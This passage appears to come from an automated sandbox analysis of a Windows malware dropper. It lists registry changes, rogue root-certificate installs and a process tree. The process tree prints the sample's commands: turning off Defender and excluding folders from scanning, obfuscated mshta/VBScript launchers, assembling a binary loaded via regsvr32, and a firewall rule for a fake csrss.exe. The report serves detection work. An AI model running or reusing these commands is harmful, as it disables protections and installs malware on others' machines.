| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [binary certificate blob omitted] | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [binary certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [binary certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [binary certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [binary certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [binary certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\Gparted\gimagex.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe
"C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe"
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon166dc6040fb8726.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16bd4a93b822a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1661118952.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16b7581baf7.exe /mixtwo
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon167f9db638e4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16ad13d7ad1b02.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1618e4439d986270.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1631358b82299bd8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16d070a064013c841.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe
Mon166dc6040fb8726.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16734014a69dec.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16737798ac26f984.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon164c5af508c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16957e622fa390.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16ac385cfd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon16e127a54386dd68.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon161bd381a14aea5c.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
Mon16734014a69dec.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon164c5af508c3.exe
Mon164c5af508c3.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe
Mon16ac385cfd.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
Mon16d070a064013c841.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe
Mon161bd381a14aea5c.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1618e4439d986270.exe
Mon1618e4439d986270.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe
Mon1661118952.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe
Mon16b7581baf7.exe /mixtwo
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe
Mon167f9db638e4.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe
Mon1631358b82299bd8.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe
Mon16bd4a93b822a.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe
Mon16737798ac26f984.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe
Mon16e127a54386dd68.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe
Mon16957e622fa390.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBscRIPt: cLoSe ( creaTEoBjecT ( "WsCrIPt.ShELl" ). run ( "C:\Windows\system32\cmd.exe /R tYpe ""C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe""> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF """" == """" for %c In ( ""C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe"" ) do taskkill -IM ""%~nXc"" -F ",0 ,TRuE ) )
C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp" /SL5="$50232,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe"
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe
"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe" -u
C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp
"C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp" /SL5="$501F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe"
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe
"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp" /SL5="$601F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R tYpe "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe"> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF "" == "" for %c In ( "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe" ) do taskkill -IM "%~nXc" -F
C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE
WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG
C:\Windows\SysWOW64\taskkill.exe
taskkill -IM "Mon1661118952.exe" -F
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBscRIPt: cLoSe ( creaTEoBjecT ( "WsCrIPt.ShELl" ). run ( "C:\Windows\system32\cmd.exe /R tYpe ""C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE""> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF ""/PBIzjiz3UWH4ATMXBTQCoG "" == """" for %c In ( ""C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE"" ) do taskkill -IM ""%~nXc"" -F ",0 ,TRuE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R tYpe "C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE"> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF "/PBIzjiz3UWH4ATMXBTQCoG " == "" for %c In ( "C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE" ) do taskkill -IM "%~nXc" -F
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIPt:cLoSe ( creaTEOBJEcT ( "wsCRipt.SheLL" ). RUN("C:\Windows\system32\cmd.exe /q /c ECho | set /P = ""MZ"" > NWHPW.hX5& CoPy /Y /b NWHPW.HX5 +TFQUjJ.N + USE8pS.0rL+ PeLOUZb0.jKJ + N6O00.K + B6Oj.Xh + K30Q.Qo AGKPq.W& sTarT regsvr32 -s aGKpQ.W " ,0 , TrUe) )
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /c ECho | set /P = "MZ" > NWHPW.hX5& CoPy /Y /b NWHPW.HX5 +TFQUjJ.N + USE8pS.0rL+ PeLOUZb0.jKJ + N6O00.K +B6Oj.Xh + K30Q.Qo AGKPq.W&sTarT regsvr32 -s aGKpQ.W
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECho "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>NWHPW.hX5"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 -s aGKpQ.W
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241106104111.log C:\Windows\Logs\CBS\CbsPersist_20241106104111.cab
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1326065463-17732016232079665164538795616749644004-1611431629-1021433569-552968636"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe
"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe"
C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
C:\Program Files (x86)\Gparted\Build.sfx.exe
"C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1
C:\Program Files (x86)\Gparted\Build.exe
"C:\Program Files (x86)\Gparted\Build.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1739371705716997079-3753041-21431654931733133288-1560707188-21284361101814353396"
C:\Program Files (x86)\Gparted\gimagex.exe
"C:\Program Files (x86)\Gparted\gimagex.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /306-306
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com
C:\Windows\system32\schtasks.exe
